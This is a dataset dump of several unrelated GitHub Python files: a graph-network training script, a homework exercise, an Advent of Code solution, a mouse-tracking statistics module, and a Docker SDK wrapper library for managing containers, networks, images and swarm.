mp.test(models.siamese_m_cgcnn(L, **params), name, params,\n data, train_pairs, train_y, val_x, val_y, test_pairs, test_y)\n\n # Common hyper-parameters for LeNet5-like networks.\n if method == '2gcn':\n str_params += 'p4_fc64_'\n name = 'mvgcn2'\n params = common.copy()\n params['method'] = '2gcn'\n params['F'] = [m, 64] # filters\n params['K'] = [k, k] # supports\n params['p'] = [4, 4]\n params['M'] = [512, C]\n params['fin'] = val_x.shape[3]\n params['dir_name'] += name\n params['filter'] = 'chebyshev5'\n params['brelu'] = 'b2relu'\n params['pool'] = 'apool1'\n mp.test(models.siamese_m_cgcnn(L, **params), name, params,\n data, train_pairs, train_y, val_x, val_y, test_pairs, test_y)\n\n # mp.save(data_type)\n method_type = method + '_'\n mp.fin_result(method_type + data_type + str_params + obj_params, i_fold)\n\nif __name__ == '__main__':\n parser = argparse.ArgumentParser()\n parser.add_argument('method', type=str)\n parser.add_argument('data_type1', type=str)\n parser.add_argument('data_type2', type=str)\n parser.add_argument('data_type3', type=str)\n parser.add_argument('data_type4', type=str)\n parser.add_argument('data_type5', type=str)\n parser.add_argument('data_type6', type=str)\n parser.add_argument('view_com', type=str)\n 
parser.add_argument('kfold', type=str)\n    parser.add_argument('K', type=int)\n    parser.add_argument('M', type=int)\n    parser.add_argument('n_epoch', type=int)\n    parser.add_argument('batch_size', type=int)\n    args = parser.parse_args()\n    print ('---------------------------------------')\n    data_type = [args.data_type1, args.data_type2, args.data_type3, args.data_type4, args.data_type5, args.data_type6]\n    n_views = len(data_type)\n    # See function train for all possible parameters and their definitions.\n    data, subj, coords, pairs, labels = utils.load_data(data_type=data_type, kfold=args.kfold)\n    data_type = args.data_type1 + '+' + args.data_type2 + '+' + args.data_type3 + '+' + args.data_type4 + '+' + args.data_type5 + '+' + args.data_type6\n    print (data.shape)\n    if args.kfold == 'True':\n        for l in range(5):\n            if l >= 1:\n                break\n            print (\"The %d fold ...\" %(l+1))\n            train(method=args.method,\n                  view_com=args.view_com,\n                  n_views=n_views,\n                  k=args.K,\n                  m=args.M,\n                  n_epoch=args.n_epoch,\n                  batch_size=args.batch_size,\n                  pairs=pairs[l],\n                  labels=labels[l],\n                  coords=coords,\n                  subj=subj,\n                  data=data,\n                  data_type=data_type,\n                  i_fold=l)\n    else:\n        print ('fixed split')\n        train(method=args.method,\n              view_com=args.view_com,\n              n_views=n_views,\n              k=args.K,\n              m=args.M,\n              n_epoch=args.n_epoch,\n              batch_size=args.batch_size,\n              pairs=pairs,\n              labels=labels,\n              coords=coords,\n              subj=subj,\n              data=data,\n              data_type=data_type)\n","repo_name":"sheryl-ai/MVGCN","sub_path":"train.py","file_name":"train.py","file_ext":"py","file_size_in_byte":18330,"program_lang":"python","lang":"en","doc_type":"code","stars":95,"dataset":"github-code","pt":"91"}
+{"seq_id":"16357973239","text":"number=[str(i) for i in range(1,11)]\r\nletter=[\"a\",\"b\",\"c\",\"d\",\"e\",\"f\",\"g\",\"h\",\"i\",\"j\"]\r\nmix1=[[i+j for i in number] for j in letter]\r\nmix2=[[j+i for i in number] for j in letter]\r\nnew1=[]\r\nnew2=[]\r\nfor i in range(0,3):\r\n for k in range (0,3):\r\n new1.append(mix1[i][k])\r\n new2.append(mix2[i][k])\r\nprint(\"1.\",sorted(new1),\"\\n\",\"2.\",sorted(new2),sep=\"\")\r\n\r\n","repo_name":"UfukD2019/Python-Homework-5.-Week","sub_path":"Homework 3 - Bonus.py","file_name":"Homework 3 - Bonus.py","file_ext":"py","file_size_in_byte":365,"program_lang":"python","lang":"en","doc_type":"code","stars":0,"dataset":"github-code","pt":"91"}
+{"seq_id":"5766248796","text":"data = []\n\nwith open('day12_input.txt', 'r') as infile:\n for line in infile:\n data.append(line)\n\n\ndef part_1():\n facing = 'E'\n ns_val = 0 # positive val is north, negative south\n ew_val = 0 # positive val east, negative west\n\n for line in data:\n direction = line[0]\n magnitude = int(line[1:])\n rotating = False\n\n R = {'N': 'E', 'E': 'S', 'S': 'W', 'W': 'N'}\n L = {'N': 'W', 'E': 'N', 'S': 'E', 'W': 'S'}\n\n if direction == 'R':\n rotating = True\n while magnitude > 0:\n facing = R.get(facing)\n magnitude -= 90\n elif direction == 'L':\n rotating = True\n while magnitude > 0:\n facing = L.get(facing)\n magnitude -= 90\n elif direction == 'F':\n direction = facing\n\n if not rotating:\n if direction == 'N':\n ns_val += magnitude\n elif direction == 'S':\n ns_val -= magnitude\n elif direction == 'E':\n ew_val += magnitude\n elif direction == 'W':\n ew_val -= magnitude\n\n print(f'final coordinates NS{ns_val}, EW{ew_val}')\n print(abs(ew_val) + abs(ns_val))\n\n\ndef part_2():\n # ship starts at origin and waypoint starts at 10E, 1N\n ship_ns_val = 0 # positive val is north, negative south\n ship_ew_val = 0 # positive val east, negative west\n wp_ns_val = 1\n wp_ew_val = 10\n\n for line in data:\n direction = line[0]\n magnitude = int(line[1:])\n\n if direction == 'N':\n wp_ns_val += magnitude\n elif direction == 'S':\n wp_ns_val -= magnitude\n elif direction == 'E':\n wp_ew_val += magnitude\n elif direction == 'W':\n wp_ew_val -= magnitude\n elif direction == 'F':\n ship_ns_val += magnitude * wp_ns_val\n ship_ew_val += magnitude * wp_ew_val\n elif direction == 'L':\n times_to_rotate = int(magnitude / 90)\n for i in range(0, times_to_rotate):\n old_ns = wp_ns_val\n old_ew = wp_ew_val\n wp_ns_val = old_ew\n wp_ew_val = -1 * old_ns\n elif direction == 'R':\n times_to_rotate = int(magnitude / 90)\n for i in range(0, times_to_rotate):\n old_ns = wp_ns_val\n old_ew = wp_ew_val\n wp_ns_val = -1 * old_ew\n wp_ew_val = old_ns\n print(abs(ship_ns_val)+ abs((ship_ew_val)))\n \n\npart_2()\n","repo_name":"rorour/AdventOfCode2020","sub_path":"12.py","file_name":"12.py","file_ext":"py","file_size_in_byte":2568,"program_lang":"python","lang":"en","doc_type":"code","stars":0,"dataset":"github-code","pt":"91"}
+{"seq_id":"22159079122","text":"#!/usr/bin/env python\n# -*- coding: utf-8 -*-\n# SPDX-License-Identifier: LGPL-2.1-or-later\nimport os\nimport numpy as np\nfrom collections import OrderedDict\n\nfrom .utils import general as utils\nfrom .write_to_file import write_registrations_stats\nfrom .plotting_functions import single_timeline_heat_map\n\n\ndef get_single_antenna_stats(ecohab_data, timeline, binsize, antennas=\"ALL\",\n                             res_dir=\"\", prefix=\"\", remove_mouse=\"\",\n                             delimiter=\";\"):\n    \"\"\"\n    Count the number and combined duration of registrations of each mouse tag\n    by the specified antennas, in bins of size binsize, for tags\n    registered in every phase.\n\n    Args:\n        ecohab_data : Loader or Loader_like\n            Eco-HAB dataset.\n        timeline : Timeline\n            timeline of the experiment.\n        binsize : number\n            size of the time bins used for calculating activity, in seconds,\n            e.g. binsize equal to 3600 results in 1 h bins.\n        antennas: string, int or list of ints\n            ids of registering antennas.\n            Default value is all antennas.\n        res_dir : string\n            destination directory.\n            Default value is the destination directory established for\n            ecohab_data.\n        prefix : string\n            string added to the name of every generated results file.\n            Default value is the prefix established for ecohab_data.\n        remove_mouse : string or list\n            name of mouse or mice to be removed from the results file.\n            By default activity will be established for every mouse registered\n            in ecohab_data.\n        delimiter : str, optional\n            String or character separating columns.\n    \"\"\"\n    if prefix == \"\":\n        prefix = ecohab_data.prefix\n    if res_dir == \"\":\n        res_dir = ecohab_data.res_dir\n    mice = utils.get_mice(ecohab_data.mice, remove_mouse)\n    add_info_mice = utils.add_info_mice_filename(remove_mouse)\n    out_dir = os.path.join(\"other_variables\", \"registration_stats\")\n    bin_ = binsize/3600\n    fname_durations = \"registration_duration_%4.2fh\" % bin_\n    fname_count = \"registration_count_%4.2fh\" % bin_\n    shortest_phase = utils.get_shortest_phase_duration(timeline)\n    if binsize <= shortest_phase:\n        phases = timeline.sections()\n        times = [timeline.get_time_from_epoch(phase) for phase in phases]\n    else:\n        t_start, t_end = timeline.get_time_from_epoch(\"ALL\")\n        phases = []\n        times = []\n        i = 0\n        while t_start < t_end:\n            phases.append(\"%dxbin_%5.2fh\" % (i, bin_))\n            times.append((t_start, t_start+binsize))\n            t_start += binsize\n            i += 1\n    if antennas == \"ALL\":\n        antennas = sorted(set(ecohab_data.get_antennas(ecohab_data.mice)))\n    if antennas in ecohab_data.all_antennas:\n        antennas = [antennas]\n    if not isinstance(antennas, list):\n        raise Exception(\"\"\"Incorrect antenna format.\n        You should either provide a list of ints, an int or 'ALL'\"\"\")\n\n    for i, phase in enumerate(phases):\n        t_start, t_end = times[i]\n        count = OrderedDict()\n        durations = OrderedDict()\n        for antenna in antennas:\n            count[antenna] = OrderedDict()\n            durations[antenna] = OrderedDict()\n            for mouse in mice:\n                results = ecohab_data.get_registration_stats(mouse,\n                                                             t_start,\n                                                             t_end,\n                                                             antenna,\n                                                             binsize)\n                count[antenna][mouse], durations[antenna][mouse] = results\n\n            single_timeline_heat_map(durations[antenna],\n                                     res_dir,\n                                     mice,\n                                     prefix,\n                                     phase,\n                                     binsize,\n                                     antenna,\n                                     out_dir)\n            new_fname_count = \"%s_%s\" % (fname_count, antenna)\n            new_fname_durations = \"%s_%s\" % (fname_durations, antenna)\n            write_registrations_stats(count, phase, mice, binsize,\n                                      new_fname_count, res_dir,\n                                      out_dir, prefix,\n                                      add_info=add_info_mice,\n                                      delimiter=delimiter)\n            write_registrations_stats(durations, phase, mice, binsize,\n                                      new_fname_durations, res_dir,\n                                      out_dir, prefix,\n                                      add_info=add_info_mice,\n                                      delimiter=delimiter)\n","repo_name":"Neuroinflab/pyEcoHAB","sub_path":"src/pyEcoHAB/single_antenna_registrations.py","file_name":"single_antenna_registrations.py","file_ext":"py","file_size_in_byte":4776,"program_lang":"python","lang":"en","doc_type":"code","stars":3,"dataset":"github-code","pt":"91"}
+{"seq_id":"8211060760","text":"import logging\n\nimport docker\n\n\nlogger = logging.getLogger(__name__)\nlogging.getLogger('docker').setLevel(logging.WARNING)\n\n\nclass BaseDocker(object):\n def __init__(\n self, base_url='unix://var/run/docker.sock',\n version=\"auto\", timeout=60, **kwargs\n ):\n self.base_url = base_url\n self.version = version\n self.timeout = timeout\n self.kwargs = kwargs\n\n self.client = None\n\n def __enter__(self):\n try:\n self.client = docker.DockerClient(\n self.base_url, version=self.version, timeout=self.timeout,\n **self.kwargs\n )\n if self.client is None:\n logger.error(\"No connection object returned.\")\n raise Exception(\"Connection failed.\")\n return self\n except Exception as e:\n logger.error(\"Failed to connection to dockerd: {}\".format(e))\n raise e\n\n def __exit__(self, exc_type, exc_val, exc_tb):\n if self.client:\n self.client.close()\n\n def info(self):\n try:\n info = self.client.info()\n except Exception as e:\n logger.error(\"Docker Info failed: {}\".format(e))\n raise e\n else:\n # return dict.\n return info\n\n def ping(self):\n try:\n result = self.client.ping()\n except Exception as e:\n logger.error(\"Docker Server not avaliable: {}\".format(e))\n raise e\n else:\n # return bool\n return result\n\n def login(\n self, username, password, registry='https://index.docker.io/v1/',\n email=\"canuxcheng@gmail.com\",\n reauth=True, dockercfg_path=\"$HOME/.docker/config.json\"\n ):\n try:\n res = self.client.login(\n username, password, email, registry, reauth, dockercfg_path\n )\n except Exception as e:\n logger.error(\"Docker Login failed: {}\".format(e))\n raise e\n else:\n # return dict\n logger.debug(res)\n return res\n\n\nclass BaseSwarm(object):\n def __init__(\n self, base_url='unix://var/run/docker.sock',\n version=\"auto\", timeout=60, **kwargs\n ):\n self.base_url = base_url\n self.version = version\n self.timeout = timeout\n self.kwargs = kwargs\n\n self.swarm = None\n\n @property\n def id(self):\n return self.swarm.id\n\n def __enter__(self):\n try:\n self.client = docker.DockerClient(\n self.base_url, version=self.version, timeout=self.timeout,\n **self.kwargs\n )\n if self.client is None:\n logger.error(\"No connection object returned.\")\n raise Exception(\"Connection failed.\")\n self.swarm = self.client.swarm\n return self\n except Exception as e:\n logger.error(\"Failed to connection to dockerd: {}\".format(e))\n raise e\n\n def __exit__(self, exc_type, exc_val, exc_tb):\n if self.client:\n self.client.close()\n\n def init(\n self, advertise_addr=None, force_new_cluster=True,\n # default_addr_pool=[\"10.0.0.0/8\"],\n default_addr_pool=[\"10.0.0.0/8\"],\n subnet_size=None, listen_addr='0.0.0.0:2377',\n **kwargs\n ):\n try:\n node_id = self.swarm.init(\n advertise_addr=advertise_addr, listen_addr=listen_addr,\n force_new_cluster=force_new_cluster,\n default_addr_pool=default_addr_pool,\n subnet_size=subnet_size, **kwargs\n )\n except Exception as e:\n logger.error(\"Docker Swarm init failed: {}\".format(e))\n raise e\n else:\n return node_id\n\n def join(\n self, remote_addrs=None, join_token=None, advertise_addr=None,\n listen_addr='0.0.0.0:2377', **kwargs\n ):\n try:\n result = self.swarm.join(\n remote_addrs=remote_addrs, join_token=join_token,\n listen_addr=listen_addr, advertise_addr=advertise_addr,\n **kwargs\n )\n except Exception as e:\n logger.error(\"Docker Swarm join failed: {}\".format(e))\n raise e\n else:\n # return True\n return result\n\n def leave(self, force=True):\n try:\n result = 
self.swarm.leave(force=force)\n except Exception as e:\n logger.error(\"Docker Swarm leave failed: {}\".format(e))\n raise e\n else:\n # return True\n return result\n\n\nclass BaseNetworks(object):\n def __init__(\n self, base_url='unix://var/run/docker.sock',\n version=\"auto\", timeout=60, **kwargs\n ):\n self.base_url = base_url\n self.version = version\n self.timeout = timeout\n self.kwargs = kwargs\n\n self.networks = None\n\n def __enter__(self):\n try:\n self.client = docker.DockerClient(\n self.base_url, version=self.version, timeout=self.timeout,\n **self.kwargs\n )\n if self.client is None:\n logger.error(\"No connection object returned.\")\n raise Exception(\"Connection failed.\")\n self.networks = self.client.networks\n return self\n except Exception as e:\n logger.error(\"Failed to connection to dockerd: {}\".format(e))\n raise e\n\n def __exit__(self, exc_type, exc_val, exc_tb):\n if self.client:\n self.client.close()\n\n @staticmethod\n def get_ipam_pool(\n subnet=None, iprange=None, gateway=None, aux_addresses=None\n ):\n try:\n ipam_pool = docker.types.IPAMPool(\n subnet=subnet, iprange=iprange, gateway=gateway,\n aux_addresses=aux_addresses\n )\n except Exception as e:\n logger.error(\"Get ipam pool failed: {}\".format(e))\n raise e\n else:\n return ipam_pool\n\n @staticmethod\n def get_ipam_config(\n driver=\"default\", pool_configs=None, options=None\n ):\n try:\n ipam_config = docker.types.IPAMConfig(\n driver=driver, pool_configs=pool_configs, options=options\n )\n except Exception as e:\n logger.error(\"Get IPAM config failed: {}\".format(e))\n raise e\n else:\n return ipam_config\n\n def create(\n self, name=None, driver=\"bridge\", scope=\"local\", ipam=None,\n check_duplicate=False, internal=False, enable_ipv6=False,\n attachable=False, ingress=False, options=None, labels=None\n ):\n try:\n network = self.networks.create(\n name=name, driver=driver, options=options, ipam=ipam,\n check_duplicate=check_duplicate, internal=internal,\n labels=labels, enable_ipv6=enable_ipv6, attachable=attachable,\n scope=scope, ingress=ingress\n )\n except Exception as e:\n logger.error(\"Docker network create failed: {}\".format(e))\n raise e\n else:\n # return Network object\n return network\n\n def create_bridge_network(\n self, name, subnet, iprange, gateway, opt_name, opt_icc, opt_im,\n attachable\n ):\n try:\n pool_config = self.get_ipam_pool(\n subnet, iprange, gateway\n )\n ipam_config = self.get_ipam_config(\n driver=\"default\", pool_configs=[pool_config], options=None\n )\n bridge = self.create(\n name=name, driver=\"bridge\", ipam=ipam_config,\n check_duplicate=True, internal=False, attachable=attachable,\n ingress=False, enable_ipv6=False, scope=\"local\",\n options={\n \"com.docker.network.bridge.enable_icc\": opt_icc,\n \"com.docker.network.bridge.enable_ip_masquerade\": opt_im,\n \"com.docker.network.bridge.name\": opt_name\n },\n labels=None\n )\n except Exception as e:\n logger.error(\"Create bridge network failed: {}\".format(e))\n return False\n else:\n return True\n\n def create_overlay_network(\n self, name, subnet, iprange, gateway, opt_name\n ):\n try:\n pool_config = self.get_ipam_pool(\n subnet, iprange, gateway, aux_addresses=None\n )\n ipam_config = self.get_ipam_config(\n driver=\"default\", pool_configs=[pool_config], options={}\n )\n overlay = self.create(\n name=name, driver=\"overlay\", ipam=ipam_config,\n check_duplicate=True, internal=False, attachable=True,\n ingress=False, enable_ipv6=False, scope=\"swarm\",\n options={\n 
\"com.docker.network.bridge.name\": opt_name\n },\n labels={},\n )\n except Exception as e:\n logger.error(\"Create bridge network failed: {}\".format(e))\n return False\n else:\n return True\n\n def prune(self, filters=None):\n try:\n networks = self.networks.prune(filters)\n except Exception as e:\n logger.error(\"Docker Network prune failed: {}\".format(e))\n raise e\n else:\n # return dict\n return networks\n\n def delete(self, names=None, ids=None, filters=None, greedy=False):\n try:\n nets = self.networks.list(\n names=names, ids=ids, filters=filters, greedy=greedy\n )\n for net in nets:\n for container in net.containers:\n logger.debug(\n \"Disconnect {} from {}\".format(\n container.name, net.name)\n )\n net.disconnect(container.name, force=True)\n logger.debug(\n \"Remove docker network {}:{}\".format(net.id, net.name)\n )\n net.remove()\n except Exception as e:\n logger.error(\"Docker Network delete failed: {}\".format(e))\n return False\n else:\n return True\n\n def delete_gwbridge(self):\n \"\"\"\n for docker swarm.\n\n ingress network attached to docker_gwbridge cause docker_gwbridge not easy to be removed.\n :return:\n \"\"\"\n try:\n nets = self.networks.list([\"docker_gwbridge\"])\n if len(nets) == 1:\n net = nets[0]\n try:\n net.disconnect(\"gateway_ingress-sbox\", force=True)\n except Exception:\n logger.error(\"disconnect gateway_ingress-sbox from docker_gwbridge failed, skip...\")\n net.remove()\n else:\n logger.debug(\"docker_gwbridge not exist.\")\n except Exception as e:\n logger.error(\"Delete docker_gwbridge failed: {}\".format(e))\n raise e\n else:\n return True\n\n def list(self, names=None, ids=None, filters=None, greedy=False):\n try:\n nets = self.networks.list(\n names=names, ids=ids, filters=filters, greedy=greedy\n )\n except Exception as e:\n logger.error(\"Docker Network list failed: {}\".format(e))\n raise e\n else:\n return nets\n\n\nclass BaseImages(object):\n def __init__(\n self, base_url='unix://var/run/docker.sock',\n version=\"auto\", timeout=60, **kwargs\n ):\n self.base_url = base_url\n self.version = version\n self.timeout = timeout\n self.kwargs = kwargs\n\n self.images = None\n\n def __enter__(self):\n try:\n self.client = docker.DockerClient(\n self.base_url, version=self.version, timeout=self.timeout,\n **self.kwargs\n )\n if self.client is None:\n logger.error(\"No connection object returned.\")\n raise Exception(\"Connection failed.\")\n self.images = self.client.images\n return self\n except Exception as e:\n logger.error(\"Failed to connection to dockerd: {}\".format(e))\n raise e\n\n def __exit__(self, exc_type, exc_val, exc_tb):\n if self.client:\n self.client.close()\n\n def load(self, data):\n try:\n images = self.images.load(data)\n except Exception as e:\n logger.error(\"Docker Image load failed: {}\".format(e))\n raise e\n else:\n # return list of Images\n return images\n\n def list(self, name=None, all=False, filters=None):\n try:\n images = self.images.list(name, all, filters)\n except Exception as e:\n logger.error(\"Docker Image list failed: {}\".format(e))\n raise e\n else:\n # return list\n return images\n\n def pull(self, repo=None, tag=None, auth_config=None, platform=None):\n try:\n images = self.images.pull(repo, tag, auth_config, platform)\n except Exception as e:\n logger.error(\"Docker Image pull failed: {}\".format(e))\n raise e\n else:\n return images\n\n def push(self, repo, tag=None, stream=True, auth_config=None, decode=True):\n try:\n for line in self.images.push(\n repo, tag, stream, auth_config, decode\n ):\n 
logger.debug(line)\n except Exception as e:\n logger.error(\"Docker Image push failed: {}\".format(e))\n raise e\n\n def prune(self, dangling=True):\n \"\"\"\n prune images.\n :param dangling: bool\n :return: dict\n True means only delete untagged images.\n False means delete all unused images.\n \"\"\"\n try:\n images = self.images.prune({\"dangling\": dangling})\n except Exception as e:\n logger.error(\"Docker Image prune failed: {}\".format(e))\n raise e\n else:\n # return dict\n return images\n\n def remove(\n self, image=None, force=False, noprune=False\n ):\n try:\n self.images.remove(image, force, noprune)\n except Exception as e:\n logger.error(\"Docker Image remove failed: {}\".format(e))\n raise e\n\n def delete_all(self):\n try:\n for image in self.list(all=True):\n self.images.remove(image.id)\n except Exception as e:\n logger.error(\"Docker Image delete failed: {}\".format(e))\n raise e\n\n @staticmethod\n def create_time(image):\n try:\n return image.attrs[\"Created\"]\n except Exception as e:\n logger.error(\"Get Image Create time failed: {}\".format(e))\n raise e\n\n\nclass BaseVolumes(object):\n def __init__(\n self, base_url='unix://var/run/docker.sock',\n version=\"auto\", timeout=60, **kwargs\n ):\n self.base_url = base_url\n self.version = version\n self.timeout = timeout\n self.kwargs = kwargs\n\n self.volumes = None\n\n def __enter__(self):\n try:\n self.client = docker.DockerClient(\n self.base_url, version=self.version, timeout=self.timeout,\n **self.kwargs\n )\n if self.client is None:\n logger.error(\"No connection object returned.\")\n raise Exception(\"Connection failed.\")\n self.volumes = self.client.volumes\n return self\n except Exception as e:\n logger.error(\"Failed to connection to dockerd: {}\".format(e))\n raise e\n\n def __exit__(self, exc_type, exc_val, exc_tb):\n if self.client:\n self.client.close()\n\n def prune(self):\n try:\n volumes = self.volumes.prune(filters=None)\n except Exception as e:\n logger.error(\"Docker Volumes prune failed: {}\".format(e))\n raise e\n else:\n # return dict\n return volumes\n\n\nclass BaseContainers(object):\n def __init__(\n self, base_url='unix://var/run/docker.sock',\n version=\"auto\", timeout=60, **kwargs\n ):\n self.base_url = base_url\n self.version = version\n self.timeout = timeout\n self.kwargs = kwargs\n\n self.containers = None\n\n def __enter__(self):\n try:\n self.client = docker.DockerClient(\n self.base_url, version=self.version, timeout=self.timeout,\n **self.kwargs\n )\n if self.client is None:\n logger.error(\"No connection object returned.\")\n raise Exception(\"Connection failed.\")\n self.containers = self.client.containers\n return self\n except Exception as e:\n logger.error(\"Failed to connection to dockerd: {}\".format(e))\n raise e\n\n def __exit__(self, exc_type, exc_val, exc_tb):\n if self.client:\n self.client.close()\n\n def list(\n self, all=False, since=None, before=None, limit=None,\n filters=None, sparse=False, ignore_removed=False\n ):\n \"\"\"\n :param all: False to show running containers.\n :param since:\n :param before:\n :param limit:\n :param filters:\n :param sparse: True to not inspect containers.\n :param ignore_removed: False to not ignore removed containers.\n :return:\n \"\"\"\n try:\n containers = self.containers.list(\n all, since, before, limit, filters, sparse, ignore_removed\n )\n except Exception as e:\n logger.error(\"Docker Containers list failed: {}\".format(e))\n raise e\n else:\n names = [\n (one.id, one.name, one.image)\n for one in containers\n ]\n 
logger.debug(\"containers: {}\".format(names))\n return containers\n\n def prune(self):\n try:\n containers = self.containers.prune(filters=None)\n except Exception as e:\n logger.error(\"Docker Containers prune failed: {}\".format(e))\n raise e\n else:\n # return dict\n return containers\n\n def delete_all(self):\n try:\n for container in self.list(all=True):\n logger.debug(\"delete container: {}\".format(container.name))\n container.stop()\n container.remove()\n except Exception as e:\n logger.error(\n \"Docker Container delete(stop/remove) failed: {}\".format(e)\n )\n raise e\n\n\nclass BaseServices(object):\n def __init__(\n self, base_url='unix://var/run/docker.sock',\n version=\"auto\", timeout=60, **kwargs\n ):\n self.base_url = base_url\n self.version = version\n self.timeout = timeout\n self.kwargs = kwargs\n\n self.services = None\n\n def __enter__(self):\n try:\n self.client = docker.DockerClient(\n self.base_url, version=self.version, timeout=self.timeout,\n **self.kwargs\n )\n if self.client is None:\n logger.error(\"No connection object returned.\")\n raise Exception(\"Connection failed.\")\n self.services = self.client.services\n return self\n except Exception as e:\n logger.error(\"Failed to connection to dockerd: {}\".format(e))\n raise e\n\n def __exit__(self, exc_type, exc_val, exc_tb):\n if self.client:\n self.client.close()\n\n def list(self, filters=None):\n try:\n services = self.services.list(filters=filters)\n except Exception as e:\n logger.error(\"Docker Service list failed: {}\".format(e))\n raise e\n else:\n # return list\n names = [\n one.name\n for one in services\n ]\n logger.debug(\"services: {}\".format(names))\n return services\n\n def delete_all(self):\n try:\n for service in self.list():\n logger.debug(\"delete service: {}\".format(service.name))\n service.remove()\n except Exception as e:\n logger.error(\n \"Docker Service delete(stop/remove) failed: {}\".format(e)\n )\n raise e\n\n def force_update_all(self):\n try:\n for service in self.list():\n logger.debug(\"force update service: {}\".format(service.name))\n service.force_update()\n except Exception as e:\n logger.error(\"Docker service force update failed: {}\".format(e))\n raise e\n\n\nclass BaseNodes(object):\n def __init__(\n self, base_url='unix://var/run/docker.sock',\n version=\"auto\", timeout=60, **kwargs\n ):\n self.base_url = base_url\n self.version = version\n self.timeout = timeout\n self.kwargs = kwargs\n\n self.nodes = None\n\n def __enter__(self):\n try:\n self.client = docker.DockerClient(\n self.base_url, version=self.version, timeout=self.timeout,\n **self.kwargs\n )\n if self.client is None:\n logger.error(\"No connection object returned.\")\n raise Exception(\"Connection failed.\")\n self.nodes = self.client.nodes\n return self\n except Exception as e:\n logger.error(\"Failed to connection to dockerd: {}\".format(e))\n raise e\n\n def __exit__(self, exc_type, exc_val, exc_tb):\n if self.client:\n self.client.close()\n\n def list(self, filters=None):\n try:\n nodes = self.nodes.list(filters=filters)\n except Exception as e:\n logger.error(\"Docker Node list failed: {}\".format(e))\n raise e\n else:\n # return list\n return nodes\n\n @staticmethod\n def node_ip(node):\n try:\n ip = node.attrs[\"Status\"][\"Addr\"]\n except Exception as e:\n logger.error(\"Get node ip address failed: {}\".format(e))\n raise e\n else:\n # return string\n return ip\n\n\nclass BasePlugin(object):\n def __init__(\n self, base_url='unix://var/run/docker.sock',\n version=\"auto\", timeout=60, 
**kwargs\n ):\n self.base_url = base_url\n self.version = version\n self.timeout = timeout\n self.kwargs = kwargs\n\n self.plugins = None\n\n def __enter__(self):\n try:\n self.client = docker.DockerClient(\n self.base_url, version=self.version, timeout=self.timeout,\n **self.kwargs\n )\n if self.client is None:\n logger.error(\"No connection object returned.\")\n raise Exception(\"Connection failed.\")\n self.plugins = self.client.plugins\n return self\n except Exception as e:\n logger.error(\"Failed to connection to dockerd: {}\".format(e))\n raise e\n\n def __exit__(self, exc_type, exc_val, exc_tb):\n if self.client:\n self.client.close()\n\n def list(self):\n try:\n plugins = self.plugins.list()\n except Exception as e:\n logger.error(\"Failed to list all plugins {}\".format(e))\n raise e\n else:\n logger.debug(\"plugins: {}\".format(plugins))\n return plugins\n\n def install(self, remote, local=None, enable=True):\n try:\n remote = remote if len(remote.split(\":\")) == 2 else remote + \":latest\"\n if not local:\n local = remote\n else:\n local = local if len(local.split(\":\")) == 2 else local + \":latest\"\n for p in self.list():\n if p.name == local:\n logger.debug(\"plugin already installed.\")\n plugin = p\n break\n else:\n plugin = self.plugins.install(remote, local)\n if not plugin.enabled:\n logger.debug(\"plugin disabled.\")\n if enable:\n plugin.enable()\n else:\n logger.debug(\"plugin enabled.\")\n if not enable:\n plugin.disable()\n except Exception as e:\n logger.error(\"Install plugin {} failed: {}\".format(remote, e))\n return False\n else:\n return True\n\n def remote(self, name, force=False):\n try:\n for plugin in self.list():\n if plugin.name == name:\n plugin.remove(force=force)\n except Exception as e:\n logger.error(\"Remove plugin {} failed: {}\".format(name, e))\n return False\n else:\n return True\n\n\nclass BaseConfigs(object):\n def __init__(\n self, base_url='unix://var/run/docker.sock',\n version=\"auto\", timeout=60, **kwargs\n ):\n self.base_url = base_url\n self.version = version\n self.timeout = timeout\n self.kwargs = kwargs\n\n self.configs = None\n\n def __enter__(self):\n try:\n self.client = docker.DockerClient(\n self.base_url, version=self.version, timeout=self.timeout,\n **self.kwargs\n )\n if self.client is None:\n logger.error(\"No connection object returned.\")\n raise Exception(\"Connection failed.\")\n self.configs = self.client.configs\n return self\n except Exception as e:\n logger.error(\"Failed to connection to dockerd: {}\".format(e))\n raise e\n\n def __exit__(self, exc_type, exc_val, exc_tb):\n if self.client:\n self.client.close()\n\n\nclass BaseSecrets(object):\n def __init__(\n self, base_url='unix://var/run/docker.sock',\n version=\"auto\", timeout=60, **kwargs\n ):\n self.base_url = base_url\n self.version = version\n self.timeout = timeout\n self.kwargs = kwargs\n\n self.secrets = None\n\n def __enter__(self):\n try:\n self.client = docker.DockerClient(\n self.base_url, version=self.version, timeout=self.timeout,\n **self.kwargs\n )\n if self.client is None:\n logger.error(\"No connection object returned.\")\n raise Exception(\"Connection failed.\")\n self.secrets = self.client.secrets\n return self\n except Exception as e:\n logger.error(\"Failed to connection to dockerd: {}\".format(e))\n raise e\n\n def __exit__(self, exc_type, exc_val, exc_tb):\n if self.client:\n 
self.client.close()\n\n\n\n","repo_name":"crazy-canux/super-devops","sub_path":"super_devops/container/docker_wrapper.py","file_name":"docker_wrapper.py","file_ext":"py","file_size_in_byte":27250,"program_lang":"python","lang":"en","doc_type":"code","stars":7,"dataset":"github-code","pt":"91"}
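Every class in the docker wrapper record above follows the same pattern: a context manager that opens one DockerClient in __enter__ and closes it in __exit__. A short usage sketch under stated assumptions (the module name docker_wrapper matches the record's file name, and the network parameters are illustrative, not taken from the source):

from docker_wrapper import BaseDocker, BaseNetworks

# Ping the daemon over the default Unix socket.
with BaseDocker() as d:
    print(d.ping())          # True if dockerd answers

# Create an attachable bridge network with a custom address pool.
with BaseNetworks() as n:
    created = n.create_bridge_network(
        name="demo_net", subnet="172.28.0.0/16", iprange="172.28.5.0/24",
        gateway="172.28.0.1", opt_name="demo_br0", opt_icc="true",
        opt_im="true", attachable=True,
    )
    print("created:", created)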
